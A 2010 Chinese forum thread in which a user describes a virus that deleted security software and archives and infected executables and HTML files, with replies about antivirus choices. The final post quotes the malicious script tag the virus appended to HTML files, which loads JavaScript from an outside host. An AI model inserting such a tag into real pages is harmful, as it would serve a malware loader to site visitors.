esnak 发表于 2010 年 1 月 28 日 01:56:52

前天中了个灰常狠毒的病毒,损失惨重。。。

RT,原来的小红伞一直对豆瓣等误报,点“忽略”点习惯了,结果一不小心点错,就中招了。

首先就在系统启动预读里插入了进程,然后就开始表演了:

先是把我备份分区里面的杀毒软件和防火墙软件全删了,包括冰刃,antivir它认得不稀奇,不过连GhostWall这种偏门玩艺,它也没放过;

跟着把备份盘下面的rar压缩包删了个金光,奇怪的是zip包没动;把自己做的自解压包插入了病毒;

把全部能解包的exe都解包,插入了病毒,全部html文件插入病毒;

把全部杀软的官方主页水产了,antivir,360等,知名安全软件论坛都给水产了,如卡饭,剑盟。

还好没动我的gho备份,不过现在给html去毒和重新下载软件的工作,够我忙几天的了,郁闷。。。。

vbvs 发表于 2010 年 1 月 28 日 02:07:24

郁闷的一天
终于碰到了一件让我开心点的事
谢谢楼主

飞狼 发表于 2010 年 1 月 28 日 03:56:28

幸好俺用卡巴斯基,没问题。:victory:

楼主能传个那个病毒的样本上来看看吗?附件。

俺没有文化 发表于 2010 年 1 月 28 日 04:16:17

用chrome浏览器,安全又快捷。

iyaner 发表于 2010 年 1 月 28 日 09:35:44

一直用小红伞,从不点忽略

kuangmin 发表于 2010 年 1 月 28 日 10:37:36

不知道这个病毒穿还原不

pengxing 发表于 2010 年 1 月 28 日 14:21:25

不知道这个病毒穿还原不
kuangmin 发表于 2010-1-28 10:37 http://www.jgwy.net/images/common/back.gif
GHO文件都不动,应该不会穿还原.

vax 发表于 2010 年 1 月 28 日 18:05:05

GHO文件都不动,应该不会穿还原.
pengxing 发表于 2010-1-28 14:21 http://jgwy.net/images/common/back.gif

留得一线生机   病毒作者不是很毒嘛

esnak 发表于 2010 年 1 月 28 日 19:53:50

留得一线生机   病毒作者不是很毒嘛
vax 发表于 2010-1-28 18:05 http://www.jgwy.net/images/common/back.gif
把我一堆的绿色软件都删了,收藏的几年的模板和源码都染了毒,还不狠毒阿???

esnak 发表于 2010 年 1 月 28 日 20:04:44

样本不小心删了,不过html末尾都加了:

<s-cript type="text/javascript" src="http://web。ba1001。net:8888/tj/tongji.js"></s-cript>

你可以去以身试毒一下:lol
页: [1] 2
查看完整版本: 前天中了个灰常狠毒的病毒,损失惨重。。。